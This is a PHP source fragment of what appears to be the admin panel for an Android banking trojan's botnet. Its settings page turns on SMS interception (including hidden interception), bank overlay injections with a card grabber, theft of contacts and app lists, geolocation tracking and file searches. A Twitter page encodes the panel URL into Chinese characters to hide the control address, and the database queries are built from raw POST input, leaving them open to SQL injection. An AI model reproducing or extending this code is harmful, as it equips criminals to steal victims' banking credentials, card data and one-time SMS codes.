"; echo "$(document).ready(function(){"; echo "$('#adduser_modal').css({'display':'block'});"; echo "});"; echo ""; } if (preg_match("/edit/",print_r($_POST,true))){ $connection = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection->exec('SET NAMES utf8'); $str = print_r($_POST,true); $str = str_replace("[","@@@",$str); $str = str_replace("]","@@@",$str); $massiv = explode("@@@", $str); $editid; $editid = str_replace("edit","", $massiv[1]); echo ""; } if (preg_match("/delete/",print_r($_POST,true))){ $connection = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection->exec('SET NAMES utf8'); $str = print_r($_POST,true); $str = str_replace("[","@@@",$str); $str = str_replace("]","@@@",$str); $massiv = explode("@@@", $str); $str = str_replace("delete","", $massiv[1]); $sql = "DELETE FROM t_users WHERE id='$str'"; $connection->query($sql); } if (preg_match("/disable/",print_r($_POST,true))){ $connection = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection->exec('SET NAMES utf8'); $str = print_r($_POST,true); $str = str_replace("[","@@@",$str); $str = str_replace("]","@@@",$str); $massiv = explode("@@@", $str); $str = str_replace("disable","", $massiv[1]); $sql = "UPDATE t_users SET status = 'Disabled' WHERE id = '$str';"; $connection->query($sql); } if (preg_match("/enable/",print_r($_POST,true))){ $connection = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection->exec('SET NAMES utf8'); $str = print_r($_POST,true); $str = str_replace("[","@@@",$str); $str = str_replace("]","@@@",$str); $massiv = explode("@@@", $str); $str = str_replace("enable","",$massiv[1]); $sql = "UPDATE t_users SET status = 'Action' WHERE id = '$str';"; $connection->query($sql); } if (preg_match("/connect/",print_r($_POST,true))){ $str = print_r($_POST,true); $str = str_replace("[","@@@",$str); $str = str_replace("]","@@@",$str); $massiv = explode("@@@", $str); $url = str_replace("connect","",isset($massiv[1]) ? $massiv[1] : ""); $Param = getURL_SERVER(); $url=str_replace("_",".",$url); $md5=md5($url); $getData = SendHTTP("$url/setURL.php","$md5|$Param|"); } if (empty($_GET['page'])) { $page = 'bots-settings'; }else{ $page = $_GET['page']; } if($page == "bots-settings"){ getBotsSETTINGS(); } elseif($page == "users"){ getUSERS(); } elseif($page == "Twitter"){ getTwitter(); } else{ getBotsSETTINGS(); } } ?>
Encrypt url for the admin panel

"; if(isset($_POST["btntwitter"])){ $textTwit = isset($_POST['adminkaurl']) ? $_POST['adminkaurl'] : ""; echo "

"; $enstr = encrypt($textTwit,cryptKey); /* $arrayText = str_split($full, 1); $fullText=""; for($i=0;$i "需", "W" => "要", "E" => "意", "R" => "在", "T" => "中", "Y" => "并", "U" => "没", "I" => "有", "O" => "个", "P" => "概", "A" => "念", "S" => "小", "D" => "语", "F" => "拼", "G" => "亡", "H" => "及", "J" => "注", "K" => "鲜", "L" => "新", "Z" => "死", "X" => "之", "C" => "类", "V" => "阿", "B" => "努", "N" => "比", "M" => "拉", "q" => "丁", "w" => "化", "e" => "体", "r" => "系", "y" => "都", "u" => "只", "i" => "斯", "o" => "一", "p" => "套", "a" => "用", "s" => "恶", "d" => "件", "f" => "来", "g" => "标", "h" => "音", "j" => "的", "k" => "符", "l" => "号", "z" => "而", "x" => "不", "c" => "是", "v" => "字", "b" => "母", "n" => "寂", "m" => "寞", "=" => "肏", "0" => "你", "1" => "妈", "2" => "屄", "3" => "引", "4" => "脚", "5" => "吸", "6" => "员", "7" => "会", "8" => "膏", "9" => "药"); foreach ($arrayCH as $key => $value) { $enstr = str_replace($key,$value,$enstr); } // 苏尔的开始 - начало // 苏尔苏尔完 - конец $full = "苏尔的开始".$enstr."苏尔苏尔完"; echo "
$full
"; } echo "
"; } function getUSERS() { $connection = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection->exec('SET NAMES utf8'); $sql = "SELECT * FROM t_users"; echo "
USERS"; echo "
"; echo ""; echo ""; foreach($connection->query($sql) as $row) { $id = $row['id']; $login = $row['login']; $right = $row['right_']; $status = $row['status']; $tag = $row['tag']; if(($tag=="")||($tag==" ")) { $tag = ""; } if($status != "Disabled") { $btn_act = ""; } else { $btn_act = ""; } echo ""; } echo "
Login Permission Tag bots Status Actions
$login $right $tag $status $btn_act
"; echo "
"; } function getBotsSETTINGS() { $connection3 = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection3->exec('SET NAMES utf8'); $sql3 = "SELECT * FROM settingsall"; $checkInjectionsApps = ""; $secondInjectionsApps = ""; $checkRequestGeolocation = ""; $secondRequestGeolocation = ""; $checkGrab_auto = ""; $Grab_auto = ""; $secondGrab_auto = ""; $checkInjGrab = ""; $InjGrab = ""; $secondInjGrab = ""; $checkPhoneContacts = ""; $secondPhoneContacts = ""; $checkStartGeolocation = ""; $secondStartGeolocation = ""; $findfiles = ""; foreach($connection3->query($sql3) as $row) { if($row['id']=="1") { $adminkaurl = $row['urls']; $injurl = $row['urlInj']; $intInterval = $row['intInterval']; if($intInterval=="") $intInterval = "14000"; $checksms = $row['checksms']; $checkhidesms = $row['checkhidesms']; $checkgeolocation = $row['checkgeolocation']; $checkInjectionsApps = $row['checkInjectionsApps']; $secondInjectionsApps = $row['secondInjectionsApps']; $checkRequestGeolocation = $row['checkRequestGeolocation']; $secondRequestGeolocation = $row['secondRequestGeolocation']; $checkGrab_auto = $row['checkGrab_auto']; $secondGrab_auto = $row['secondGrab_auto']; $checkInjGrab = $row['checkInjGrab']; $secondInjGrab = $row['secondInjGrab']; $checkPhoneContacts = $row['checkPhoneContacts']; $secondPhoneContacts = $row['secondPhoneContacts']; $checkStartGeolocation = $row['checkStartGeolocation']; $secondStartGeolocation = $row['secondStartGeolocation']; $findfiles = $row['findfiles']; break; } } echo "
Bots SETTINGS


URLs panel(url1,url2,..)

URL injections

Bots request interval(Milliseconds)

Find the raw file(.doc/.txt/.apk)

"; if($checksms=="1"){ echo ""; }else{ echo ""; } echo "Interception SMS

"; if($checkhidesms=="1"){ echo ""; }else{ echo ""; } echo "Hidden SMS interception

"; if($checkgeolocation=="1"){ echo ""; }else{ echo ""; } echo "Start geolocation

On timer:

"; if($checkInjectionsApps=="1"){ echo ""; }else{ echo ""; $secondInjectionsApps=""; } echo " Request permission for injection
seconds

"; if($checkRequestGeolocation=="1"){ echo ""; }else{ echo ""; $secondRequestGeolocation=""; } echo " Request permission for geolocation seconds

"; if($checkGrab_auto=="1"){ echo ""; }else{ echo ""; $secondGrab_auto=""; } echo " Auto Injects Banks seconds "; //-----------------------Авто инжект------------------------- $connection = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection->exec('SET NAMES utf8'); $sql = "SELECT * FROM injection"; $sql2 = "SELECT * FROM settingsall"; echo "
"; if($checkInjGrab=="1"){ echo ""; }else{ echo ""; $secondInjGrab=""; } echo " Select Injections + Grabber Cards
seconds"; //-----------------------Выбранные инжекты--+--Граббер карт------------------------- $connection = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection->exec('SET NAMES utf8'); $sql = "SELECT * FROM injection"; $sql2 = "SELECT * FROM settingsall"; foreach($connection->query($sql2) as $row) { $id=$row['id']; if($id=="1") { $InjGrab = $row['checkInjGrab']; $InjGrab = $row['InjGrab']; $secondInjGrab = $row['secondInjGrab']; break; } } $inject_s = explode("|", $InjGrab); echo "
"; $idcheck=0; foreach($connection->query($sql) as $row) { $ID_inj = $row['id']; $name_inj = $row['name']; $bool_inj=false; foreach($inject_s as $ids) { $bool_inj=false; if($ids == $ID_inj) { echo "$name_inj
"; $idcheck++; break; } else { $bool_inj = true; } } if($bool_inj == true) { echo "$name_inj
"; $idcheck++; } } echo "

"; if($checkPhoneContacts=="1"){ echo ""; }else{ echo ""; $secondPhoneContacts=""; } echo " Get phone contacts/all applications
seconds

"; if($checkStartGeolocation == "1"){ echo ""; }else{ echo ""; $secondStartGeolocation=""; } echo " Start geolocation
seconds


"; } //***** function CheckURL($url){ if($url=check_url($url)) { if ($o=open_url($url)) { return true; } else { return false; } } else return false; } function check_url($url) { if(preg_match("@^http://@i",$url)) $url = preg_replace("@(http://)+@i",'http://',$url); else if (preg_match("@^https://@i",$url)) $url = preg_replace("@(https://)+@i",'https://',$url); else $url = 'http://'.$url; if (filter_var($url, FILTER_VALIDATE_URL) === FALSE) { return false; } else return $url; } // Существование ссылки (URL) function open_url($url) { $url_c=parse_url($url); if (!empty($url_c['host']) and checkdnsrr($url_c['host'])) { // Ответ сервера if ($otvet=@get_headers($url)){ return substr($otvet[0], 9, 3); } } return false; } function SendHTTP($URL,$request){ //if(CheckURL("$URL")){ if(($request!=null)&&(strlen($request)!=0)){ $params = array('p' => $request); $result = file_get_contents("$URL", false, stream_context_create(array( 'http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => http_build_query($params) ) ))); } return "$result"; /*}else{ return "noconnect|";*/ //} } //***** function getURL_SERVER(){ $protocol=empty($_SERVER['HTTPS'])?'http://':'https://'; $SERVER_NAME = $_SERVER['SERVER_NAME']; return "$protocol$SERVER_NAME"; } //***** ?>